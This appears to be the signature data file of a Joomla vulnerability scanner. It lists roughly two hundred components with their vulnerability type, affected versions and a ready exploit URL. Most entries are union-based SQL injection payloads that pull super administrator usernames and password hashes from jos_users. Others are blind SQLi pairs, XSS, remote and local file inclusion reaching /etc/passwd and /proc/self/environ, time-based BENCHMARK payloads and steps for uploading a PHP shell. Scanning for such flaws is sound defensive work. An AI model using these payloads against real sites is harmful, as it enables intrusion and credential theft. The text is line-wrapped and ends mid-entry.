Camelcitydb2 SQL Injection Vulnerability Versions effected: N/A|/comp onents/com_camelcitydb2/|/index.php?option=com_camelcitydb2&id=-3+union+select+1 ,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users+where+ usertype=0x53757065722041646d696e6973747261746f72--&view=detail&Itemid=15 Component: com_fantasytournament SQL Injection Vulnerability Versions effected: N/A|/components/com_fantasytournament/|/index.php?option=com_fantasytournament&I temid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58 ),password),2,3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261 746f72-Component: com_rdautos SQL Injection Vulnerability Versions effected: N/A|/compo nents/com_rdautos/|/index.php?option=com_rdautos&view=category&id=-1+union+selec t+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722 041646d696e6973747261746f72--&Itemid=54 Component: com_news SQL Injection Vulnerability Versions effected: N/A|/componen ts/com_news/|/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0 x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: BazaarBuilder Shopping Cart Software (com_prod) SQL Injection Vulnera bility Versions effected: 5.0<= |/components/com_prod/|/index.php?option=com_pro d&task=products&cid=-9999%20union%20all%20select%201,2,3,concat(username,char(58 ),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from/**/jos_users+where+usert ype=0x53757065722041646d696e6973747261746f72+/*+ Component: com_beamospetition XSS Vulnerability Versions effected: 1.0.12|/comp onents/com_beamospetition/|/index.php?option=com_beamospetition&func=sign&pet='> <script>alert(1)</script> Component: beamospetition SQL Injection Vulnerability variant 2 Version Affected : N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&func= sign&mpid=-9999'%20union%20select%200,1,concat(username,char(58),password),3,4,5 ,6,7,8,9,10,11,12,13,14,15%20from%20jos_users+where+usertype=0x53757065722041646 d696e6973747261746f72-Component: com_flashmagazinedeluxe SQL Injection Vulnerability Versions effected : N/A|/components/com_flashmagazinedeluxe/|/index.php?option=com_flashmagazinede luxe&Itemid=10&task=magazine&mag_id=-4+union+select+1,2,3,concat(username,char(5 8),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35+from+jos_users+where+usertype=0x53757065722041646d696e69737 47261746f72--

    Component: pcchess Blind SQL Injection Vulnerability Versions effected: N/A |/components/com_pcchess/|/index.php?option=com_pcchess&Itemid=84&page=showgame& game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id =1+and+1=2 Component: PC CookBook Blind SQL Injection Vulnerability Versions effecte d: N/A|/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewrec ipe&recipe_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&g ame_id=1+and+1=2 Component: com_waticketsystem Blind SQL Injection Vulnerability Versions effecte d: N/A|/components/com_waticketsystem/|/index.php?option=com_waticketsystem&act= category&catid=1+and+1=1::/index.php?option=com_waticketsystem&act=category&cati d=1+and+1=2 Component: com_eventing Blind SQL Injection Vulnerability Versions effected: 1.6 .x|/components/com_eventing/|/index.php?option=com_eventing&catid=1+and+1=1::/in dex.php?option=com_eventing&catid=1+and+1=2 Component: com_sitemap Remote File Inclusion Vulnerability Versions effected: N /A|/components/com_sitemap/sitemap.xml.php|/components/com_sitemap/sitemap.xml.p hp?mosConfig_absolute_path= Component: com_rss DOS Vulnerability Versions effected: Joomla! <= 1.0.7|/compo nents/com_rss/|/index2.php?option=com_rss&feed=test Component: com_Jambook Remote File Inclusion Vulnerability Versions effected: 1. 0 beta7|/components/com_Jambook/jambook.php|/components/com_Jambook/jambook.php? mosConfig_absolute_path= Component: com_akogallery SQL Injection Vulnerability Versions effected: N/A|/co mponents/com_akogallery|/index.php?option=com_akogallery&Itemid=1&func=detail&id =-334455+union+select+null,null,concat(0x1e,username,0x3a,password,0x1e,0x3a,use rtype,0x1e),null,null,null,null,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973 747261746f72-Component: com_gsticketsystem (catid) Blind SQL Injection Vulnerability Version s effected: N/A|/components/com_gsticketsystem/|/index.php?option=com_gsticketsy stem&controller=entrypoint&task=viewCategory&catid=1+and+1=1::/index.php?option= com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=1+and+1=2 Component: com_casino_blackjack SQL Injection Vulnerability Versions effected: 0.3.1 <=|/components/com_casino_blackjack/|/index.php?option=com_casino_blackjac k&game_mode=Blackjack&shuffle=1&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x 3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e697374 7261746f72-Component: com_casinobase SQL Injection Vulnerability Versions effected: 0.3.1 <=|/components/com_casinobase/|/index.php?option=com_casinobase&Itemid=1+AND+1=2 +UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertyp e=0x53757065722041646d696e6973747261746f72-Component: com_casino_videopoker SQL Injection Vulnerability Versions effected: 0.3.1 <=|/components/com_casino_videopoker/|/index.php?option=com_casino_videopo ker&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos _users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_agoragroup AgoraGroup Blind SQL Injection Vulnerability Versions effected: 0.3.5.3 <=|/components/com_agoragroup/|/index.php?option=com_agoragr oup&con=groupdetail&id=1+and+1=1::/index.php?option=com_agoragroup&con=groupdeta il&id=1+and+1=2 Component: com_jvideo SQL Injection Vulnerability Versions effected: 0.3.x|/com ponents/com_jvideo/|/index.php?option=com_jvideo&view=user&user_id=62+and+1=2+un ion+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x537570 65722041646d696e6973747261746f72-Component: Seminar com_seminar Blind SQL Injection Vulnerability Versions effect ed: 2.0.4 <=|/components/com_seminar/|/index.php?option=com_seminar&task=View_se minar&id=1+and+1=1::index.php?option=com_seminar&task=View_seminar&id=1+and+1=2 Component: Omilen Photo Gallery LFI Vulnerability Versions effected: 0.5b <=|/c omponents/com_omphotogallery/|/index.php?option=com_omphotogallery&controller= Component: RFI Vulnerability Versions effected: 2.1b7 <=|/components/com_artfor

    ms/assets/captcha/includes/captchaform/imgcaptcha.php|/components/com_artforms/a ssets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path= Component: com_bsadv Boy Scout Advancement SQL Injection Vulnerability Versions effected: 0.3 <=|/components/com_bsadv/|/index.php?option=com_bsadv&controller= peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3a,password),3,4+FR OM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_rsgallery2 Attacker's Backdoored Vulnerability Versions effected: legacy_1.14.3, 2.0.0b1|/components/com_rsgallery2/|According to joomlacode.org, the svn account of the author was hacked and attacker injected remote command e xecution backdoor. If you have access to the source code, search & examine for e val, exec in /components/rsallery2 Component: com_agora Remote File Upload Vulnerability Versions effected: 3.0.0 <=|/components/com_agora/|Requires Member registration to verify. After registr ation, go to site.com/index.php?option=com_agora&task=upload and upload a php sh ell. Check if it's at /components/com_agora/img/members/0/yourshell.php. Component: com_juser SQL Injection Vulnerability Versions effected: N/A|/compon ents/com_juser/|/index.php?option=com_juser&task=show_profile&id=+and+1=2+union+ select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_mosres (property_uid) SQL Injection Vulnerability Versions effec ted: 4.5.2 <=|/components/com_mosres/|/index.php?option=com_mosres&task=viewprop erty&property_uid=99+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password) ,6,7,8,9,10,11,12,13+from+jos_users+where+usertype=0x53757065722041646d696e69737 47261746f72/* Component: com_school SQL Injection Vulnerability Versions effected: 1.4 <=|/co mponents/com_school/|/index.php?option=com_school&Itemid=null&func=showclass&cla ssid=99+union+select+concat(username,0x3a,password),null+from+jos_users+where+us ertype=0x53757065722041646d696e6973747261746f72/* Component: com_moofaq MooFAQ LFI Vulnerability Versions effected: 1.0 <=|/compo nents/com_moofaq/|/components/com_moofaq/includes/file_includer.php?gzip=0&file= Component: com_portafolio (cid) SQL Injection Vulnerability Versions effected: N/A|/components/com_portafolio/|/index.php?option=com_portafolio&task=viewcat&ci d=-1+and+1=2+union+select+1,2,3,4,5,6,7,0x3A616662633734643036333233306362616235 6432393066646130393633636537,9--&Itemid=5 Component: com_booklibrary RFI Vulnerability Versions effected: 1.5.2.4 <=|/com ponents/com_booklibrary/|/com_booklibrary/toolbar_ext.php?mosConfig_absolute_pat h= Component: com_media_library RFI Vulnerability Versions effected: 1.5.3 <=|/com ponents/com_media_library/|/com_media_library/toolbar_ext.php?mosConfig_absolute _path= Component: RFI Vulnerability Versions effected: N/A|/components/com_realestatem anager/|/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path= Component: com_vehiclemanager RFI Vulnerability Versions effected: 1.0 <=|/comp onents/com_vehiclemanager/|/com_vehiclemanager/toolbar_ext.php?mosConfig_absolut e_path= Component: com_projectfork LFI Vulnerability Versions effected: 2.0.10 <=|/comp onents/com_projectfork/|/index.php?option=com_projectfork&section= Component: com_ijoomla_rss Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_ijoomla_rss/|/index.php?option=com_ijoomla_rss&act=xml&cat=1 +and+1=1::/index.php?option=com_ijoomla_rss&act=xml&cat=1+and+1=2 Component: com_jumi (fileid) Blind SQL Injection Vulnerability Versions effected : N/A|/components/com_jumi/|/index.php?option=com_jumi&fileid=1+and+1=1::/index. php?option=com_jumi&fileid=1+and+1=2 Component: com_tickets (id) SQL Injection Vulnerability Versions effected: N/A| /components/com_tickets/|/index.php?option=com_tickets&task=form&id=1+and+1=2+un ion+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,1 7,18+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e697374 7261746f72/* Component: com_pinboard Remote File Upload Vulnerability Versions effected: N/A |/components/com_pinboard/|/components/com_pinboard/popup/popup.php?option=showu

    pload Component: com_amocourse (catid) SQL Injection Vulnerability Versions effected: N/A|/components/com_amocourse/|/index.php?option=com_amocourse&task=view&view=ca tegory&catid=1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11, 12+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_pinboard SQL Injection Vulnerability Versions effected: N/A|/comp onents/com_pinboard/|/index.php?option=com_pinboard&Itemid=1&action=showpic&task =-48%20union%20select%201,2,3,4,5,6,concat(username,0x3a,password),8,9,10%20from %20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_bookflip(book_id) SQL Injection Vulnerability Versions effected: 2.1 <=|/components/com_bookflip/|/index.php?option=com_bookflip&book_id=-9999+UN ION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/jos_users+w here+usertype=0x53757065722041646d696e6973747261746f72-Component: com_k2 (sectionid) SQL Injection Vulnerability Versions effected: 1. 0.1 Beta <=|/components/com_k2/|/index.php?option=com_k2&view=itemlist&category= null'+and+1=2+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11, 12,13,14+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72Component: com_php (id) Blind SQL Injection Vulnerability Versions effected: N/ A|/components/com_php/|/index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and +1=1::/index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and+1=2 Component: mod_letterman XSS Vulnerability Versions effected: 1.2.4 <=|/compone nts/mod_letterman/|/index.php?option=com_letterman&task=view&id=1&Itemid=1%22%3E %3Cscript%3Ealert(1);%3C/script%3E Component: com_googlebase VirtueMart RFI Vulnerability Versions Affected: 1.1 < = |/components/com_googlebase/|/components/com_googlebase/admin.googlebase.php?m osConfig_absolute_path= Component: com_googlebase VirtueMart RFI Vulnerability Versions Affected: 1.1 < = |/administrator/components/com_googlebase/|/administrator/components/com_googl ebase/admin.googlebase.php?mosConfig_absolute_path= Component: J! Reactions RFI Vulnerability Versions Affected: 1.8.1 <= |/administ rator/components/com_jreactions/|/administrator/components/com_jreactions/langse t.php?comPath= Component: mosListMessenger com_lmo SQL Injection Vulnerability Versions effect ed: 2.1.0 <=|/components/com_lm/|/index.php?option=com_lms&task=showTests&cat=-1 +union+select+1,concat(username,0x3a,password),3,4,5,6,7+from jos_users+from+jos _users+where+usertype=0x53757065722041646d696e6973747261746f72/* Component: com_akobook (gbid) Guestbook SQL Injection Vulnerability Versions ef fected: SE 2.3 <= |/components/com_akobook/|N/A Component: com_akobook Guestbook XSS Vulnerability Versions effected: SE 3.42 <= |/components/com_akobook/|Input passed to the "gbmail"/"gbpage" parameters in t he signing page (generally index.php?option=com_akobook&func=sign) is not proper ly santised. Submit gbmail as a' onblur=alert(0) a='. To confirm, go back signin g page. Click the mail input box. Press tab and you got XSS. Component: com_propertylab (auction_id) SQL Injection Vulnerability Versions ef fected: N/A|/components/com_propertylab/|/index.php?option=com_propertylab&task= propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+ union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users+where+use rtype=0x53757065722041646d696e6973747261746f72-Component: com_mailarchive XSS Vulnerability Versions effected: N/A|/components /com_mailarchive/|/index.php?option=com_mailarchive&Itemid=212&view=EXP&perpage= 20&revdate=on&datestart=&dateend=&author="><script>alert(0)</script>&subject=">< script>alert(0)</script>&exactsubject="><script>alert(0)</script>&search=&submit =Apply Component: com_journal XSS Injection Vulnerability Versions effected: N/A|/comp onents/com_journal/|/index.php?option=com_journal&Itemid=213&page=index&journal= default&view=FULL&logfile=ALL&icon=ALL&version=ALL&buildstart=&buildend=&perpage =20&search="><script>alert(0)</script>&find=Find Component: com_simplefaq SQL Injection Vulnerability Versions effected: N/A|/com

    ponents/com_simplefaq/|/index.php?option=com_simplefaq&task=answer&Itemid=9999&c atid=9999&aid=-1/**/union/**/select/**/0,0,concat(username,0x3a,password),0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users+from+jos_users+where+usertype=0 x53757065722041646d696e6973747261746f72/* Component: com_gallery SQL Injection Vulnerability Versions effected: N/A|/comp onents/com_gallery/|/index.php?option=com_gallery&Itemid=0&func=detail&id=-99999 /**/union/**/select/**/0,0,concat (username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0/**/from/**/jos_users+where+usertype=0x53757065722041646d696e69737 47261746f72/* Component: com_category (cat_id) SQL Injection Vulnerability Versions effected: N/A|/components/com_category/|/index.php?option=com_category&id=12&task=view&co lor=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+fro m+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f 72-Component: com_jobline (search) Blind SQL Injection Vulnerability Versions effec ted: 1.3.1 <=|/components/com_jobline/|/index.php?option=com_jobline&task=result s&Itemid=&search=%' and 1=1 and '%'='::/index.php?option=com_jobline&task=result s&Itemid=&search=%' and 1=2 and '%'=' Component: com_knowledgebase addon FCKEditor Abuse of Functionalities Vulnerab ility Versions effected: 2.6.1.4 <=|/components/com_knowledgebase/fckeditor/fcke ditor.js|Certain versions of FCKeditor have multiple security vulnerabilities. Component: X-Shop RFI Vulnerability Versions Affected: 1.7 <= |/administrator/co mponents/com_x-shop/|/administrator/components/com_x-shop/admin.x-shop?mosConfig _absolute_path= Component: Taskhopper (com_thopper) RFI Vulnerability Versions effected: 1.1 <=| /components/com_thopper/|/com_thopper/inc/contact_type.php?mosConfig_absolute_pa th= Component: com_asortyment (katid) SQL Injection Vulnerability Versions effected : N/A|/components/com_asortyment/|/index.php?option=com_asortyment&Itemid=36&lan g=pl&task=kat&katid=-9999999+union+select+0,concat(username,0x3a,password),2,3,4 ,5,6,7,8,9+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e 6973747261746f72/* Component: com_awesom SQL Injection Vulnerability Versions effected: N/A|/compon ents/com_awesom/|/index.php?option=com_awesom&Itemid=99&task=viewlist&listid=-1/ **/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,nu ll,null,null/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041 646d696e6973747261746f72/* Component: com_be_it_easypartner RFI Vulnerability Versions effected: N/A|/com ponents/com_be_it_easypartner/|/components/com_be_it_easypartner/be_it_easypartn er.ajax.php?mosConfig_absolute_path= Component: com_blog (pid) SQL Injection Vulnerability Versions effected: N/A|/c omponents/com_blog/|/index.php?option=com_blog&name=aria-Security.Net&task=view& pid=\x27\x6F\x72 SELECT * Component: com_activities SQL Injection Vulnerability Versions effected: N/A|/c omponents/com_activities/|/index.php?option=com_activities&Itemid=51&func=detail &id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065 722041646d696e6973747261746f72/* Component: com_catalogshop SQL Injection Vulnerability Versions effected: 1.0 b eta 1 <=|/components/com_catalogshop/|/index.php?option=com_catalogshop&Itemid=9 9&func=detail&id=-1/**/union/**/select/**/null,null,concat(username,0x3a,passwor d),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users+from+jos_users+where+usertype= 0x53757065722041646d696e6973747261746f72/* Component: com_guideSQL Injection Vulnerability Versions effected: N/A|/compone nts/com_guide/|/index.php?option=com_guide&category=-999999/**/union/**/select/* */0,1,concat(username,0x3a,password),3,4,5,6,7,8/**/from/**/jos_users+where+user type=0x53757065722041646d696e6973747261746f72/* Component: com_clickheat RFI Vulnerability Versions effected: N/A|/components/ com_ clickheat/|/index.php?option=com_ clickheat&task= Component: com_clickheat XSS Vulnerability Versions effected: N/A|/components/c

    om_clickheat/|/index.php?option=com_ clickheat&task=http://ha.ckers.org/xss.js Component: Community Exchange com_cx (user_id) SQL Injection Vulnerability Vers ions effected: 1.0.0 <=|/components/com_cx/|/index.php?option=com_cx&task=showra ting&user_id=-3+union+select+1,concat(username,0x3a,password),3+from+jos_users+w here+usertype=0x53757065722041646d696e6973747261746f72-Component: com_eventlist (did) SQL Injection Vulnerability Versions effected: 0 .8 <=|/components/com_eventlist/|/index.php?option=com_eventlist&func=details&di d=9999999999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,us ertype,0x1e),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0+FROM+jos_users+w here+usertype=0x53757065722041646d696e6973747261746f72-Component: com_estateagent SQL Injection Vulnerability Versions effected: 0.1 < =|/components/com_estateagent/|/index.php?option=com_estateagent&Itemid=99&func= showObject&info=contact&objid=-9999/**/union/**/select/**/0,concat(username,0x3a ,password)/**/from/**/jos_users+where+usertype=0x53757065722041646d696e697374726 1746f72/*&results=null Component: com_downloads(cat) SQL Injection Vulnerability Versions effected: N/ A|/components/com_downloads/|/index.php?option=com_downloads&Itemid=99&func=sele ctcat&cat=-1/**/union/**/select/**/0,concat(username,0x3a,password),2/**/from/** /jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/* Component: com_detail(cat) SQL Injection Vulnerability Versions effected: N/A|/ components/com_detail/|/index.php?option=com_detail&Itemid=99&id=-1/**/union/**/ select/**/0,1,2,3, /index.php?option=com_downloads&Itemid=null&func=selectcat&ca t=-1/**/union/**/select/**/0,concat(username,0x3a,password),2,3/**/from/**/jos_u sers+where+usertype=0x53757065722041646d696e6973747261746f72/* Component: com_datsogallery SQL Injection Vulnerability Versions effected: 1.3. 1 <=|/components/com_datsogallery/|/index.php?option=com_datsogallery&func=detai l&id=-999+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,1,2,3,4, 5+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/* Component: Dada Mail Manager Component Remote File Inclusion Vulnerability Ver sion Affected: 2.6 <= |/administrator/components/|/administrator/components/co m_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]= Component: Facile Forms RFI Vulnerability Versions Affected: N/A|/componen ts/com_facileforms/|/components/com_facileforms/facileforms.frame.php?ff_compath = Component: com_foevpartners SQL Injection Vulnerability Versions effected: N/A| /components/com_foevpartners/|/index.php?option=com_listoffreeads&AdId=-1/**/uni on/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users+where+user type=0x53757065722041646d696e6973747261746f72/* Component: com_inter SQL Injection Vulnerability Versions effected: N/A|/compon ents/com_inter/|/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/** /union/**/select/**/0,1,2,3,concat(username,0x3a,password),5,6,7,8,9/**/from/**/ jos_user+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_emcomposer SQL Injection Vulnerability Versions effected: N/A|/c omponents/com_emcomposer/|N/A Component: com_ixxocart SQL Injection Vulnerability Versions effected: 3.9.6.1 <|/components/com_ixxocart/|/index.php?option=com_ixxocart&Itemid=1&p=catalog&pa rent=1\x27\x4F\x52+SELECT+*&pg=1 Component: com_publication SQL Injection Vulnerability Versions effected: N/A|/ components/com_publication/|/index.php?option=com_publication&task=view&pid=-999 9999+union/**/select+0,concat(username,0x3a,password),0,0,0,0,0/**/from/**/jos_u sers+where+usertype=0x53757065722041646d696e6973747261746f72/* Component: com_lexikon SQL Injection Vulnerability Versions effected: N/A|/comp onents/com_lexikon/|/index.php?option=com_lexikon&id=-1/**/union/**/select/**/0, concat(username,0x3a,password),2/**/from/**/jos_users+where+usertype=0x537570657 22041646d696e6973747261746f72/* Component: com_filebase SQL Injection Vulnerability Versions effected: N/A|/com ponents/com_filebase/|/index.php?option=com_filebase&Itemid=-999&func=selectfold er&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2/**/from /**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/* Component: Almond Classifieds com_aclassf (id) Blind SQL Injection Vulnerability

    Versions effected: 5.6.2 <=|/components/com_aclassf/|/index.php?option=com_acl assf&Itemid=26&ct=merch5&md=details&id=1+and+1=1::/index.php?option=com_aclassf& Itemid=26&ct=merch5&md=details&id=1+and+1=2 Component: Almond Classifieds com_aclassf (replid) Blind SQL Injection Vulnerabi lity Versions effected: 7.5 <=|/components/com_aclassf/|/index.php?option=com_a classf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=1::/index.php?option=co m_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=2 Component: Almond Classifieds com_aclassf (addr) XSS Vulnerability Versions effe cted: 7.5 <=|/components/com_aclassf/|/components/com_aclassf/gmap.php?addr=">< script>alert(1)</script> Component: com_pms SQL Injection Vulnerability Versions effected: 2.0.4 <=|/com ponents/com_pms/|Requires valid user account on the target site. See for more in formation -> http://milw0rm.com/exploits/9398 Component: com_joomloads SQL Injection Vulnerability Versions effected: N/A|/co mponents/com_joomloads/|/index.php?option=com_joomloads&view=package&Itemid=2&pa ckageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,1 2,13,14,15,16,17+from+jos_users-Component: Kunena Forums com_kunena (func) Blind SQL Injection Vulnerability Ver sions effected: N/A|/components/com_kunena/|/index.php?option=com_kunena&Itemid= -3&func=1+and+1=1::/index.php?option=com_kunena&Itemid=-3&func=1+and+1=2 Component: com_misterestate Blind SQL Injection Vulnerability Versions effected : N/A|/components/com_misterestate/|/index.php?option=com_misterestate&act=mesea rch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district= no&mesearch=Start+Search&searchstring=1%'+and+1=1::/index.php?option=com_mistere state&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&to wn=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=2 Template: be2004-2 File Inclusion Vulnerability Versions Affected: 2 <= |/temp lates/be2004-2/|/templates/be2004-2/index.php?mosConfig_absolute_path= Module: AutoStand Category mod_as_category File Inclusion Vulnerability Versions Affected: 1.x <= |/modules/mod_as_category.php|/modules/mod_as_category /mod_as_category.php?mosConfig_absolute_path= Module: Quick Question module Versions Affected: 4.5.1 <= |/modules/mod_quick _question.php|N/A Module: Module mod_pxt File Inclusion Vulnerability Versions Affected: N /A |/modules/mod_pxt/|/modules/mod_pxt/mod_pxt_latest.php?GLOBALS[mosConfig_ absolute_path]= Module: mod_calendar File Inclusion Vulnerability Versions Affected: N/A| /modules/mod_calendar.php|/modules/mod_calendar.php?absolute_path= Extension: UIajaxIM XSS Vulnerability Versions effected: 1.1 <=|/ajaxim/|Requir es valid user account on the target site. See for more information -> http://mil w0rm.com/exploits/9244 Component: JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities: S QL Injection Versions Affected: 1.5.1 |/index.php?option=com_jscalendar&view=j scalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users|/index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=9 99 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users Component: JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities: Lo cal File Inclusion Versions Affected: 1.0 |/index.php?option=com_jeguestbook&v iew=../../../../../../../../etc/passwd%00|/index.php?option=com_jeguestbook&view =../../../../../../../../etc/passwd%00 Component: JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities: SQ L Injection Versions Affected: 1.0 |/index.php?option=com_jeguestbook&view=ite m_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))| /index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x4 1=0x41, BENCHMARK(999999999,NULL),NULL))) Component: Joomla Component (com_elite_experts) SQL Injection Versions Affecte d: "any" |/index.php?option=com_elite_experts&task=showExpertProfileDetailed&get ExpertsFromCountry=&language=ru&id=|/index.php?option=com_elite_experts&task=sho wExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= Component: JComponent com_ezautos SQL Injection Versions Affected: "any"|/inde

    x.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1|/index.php?opti on=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 Component: TimeTrack SQL Injection Versions Affected: 1.2.4|/index.php?option= com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCA T(username,0x3A,password) FROM jos_users|/index.php?option=com_timetrack&view=ti metrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,passw ord) FROM jos_users Component: Joomla JGen Component SQL Injection Versions Affected: "any" |/inde x.php?option=com_jgen&task=view&id=|/index.php?option=com_jgen&task=view&id= Component: Joomla Component Mosets Tree 2.1.5 Shell Upload Versions Affected: 2.1.5 |/http://{target}/components/com_mtree/img/listings/o/{id}.php where {id}| /http://{target}/components/com_mtree/img/listings/o/{id}.php where {id} Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion Versions A ffected: 1.0 Alpha 3 |/index.php?option=com_jphone&controller../../../../../../. ./../../../etc/passwd%00|/index.php?option=com_jphone&controller../../../../../. ./../../../../etc/passwd%00 Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion Versions A ffected: 1.0 Alpha 3 |/index.php?option=com_jphone&controller../../../../../../. ./../../../proc/self/environ%00|/index.php?option=com_jphone&controller../../../ ../../../../../../../proc/self/environ%00 Component: Visitors Google Map SQL Injection Versions Affected: 1.0.1 |/module s/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0|/modules/m od_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 Component: Joomla Component Aardvertiser SQL Injection Versions Affected: 2.1 |/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view|/ind ex.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view Component: Joomla Component Clantools SQL Injection Versions Affected: 1.2.3 | /index.php?option=com_clantools&squad=1+|/index.php?option=com_clantools&squad=1 + Component: Joomla Component Clantools SQL Injection Versions Affected: 1.2.3 | /index.php?option=com_clantools&task=clanwar&showgame=1+|/index.php?option=com_c lantools&task=clanwar&showgame=1+ Component: Joomla Component Clantools SQL Injection Versions Affected: 1.5 |/i ndex.php?option=com_clantools&squad=1+|/index.php?option=com_clantools&squad=1+ Component: Joomla Component JE Pro SQL Injection Versions Affected: 1.5.0 |/in dex.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2|/index.php ?option=com_jefaqpro&view=category&layout=categorylist&catid=2 Component: Joomla Component JE Pro SQL Injection Versions Affected: 1.5.0 |/in dex.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 |/index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&cat id=2 Component: PhotoMap Gallery SQL Injection Versions Affected: 1.6.0 |/index.php ?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(9999999999,NULL),NULL)))|/index.php?option=com_photomapgallery&view=im agehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) Component: JComponent Zoom Portfolio SQL Injection Versions Affected: 1.5 |/in dex.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=|/index.php?op tion=com_zoomportfolio&view=portfolio&view=portfolio&id= Component: Joomla Component (com_Fabrik) SQL Injection Versions Affected: "any "|/index.php?option=com_fabrik&view=table&tableid=13+union+select+1----|/index.p 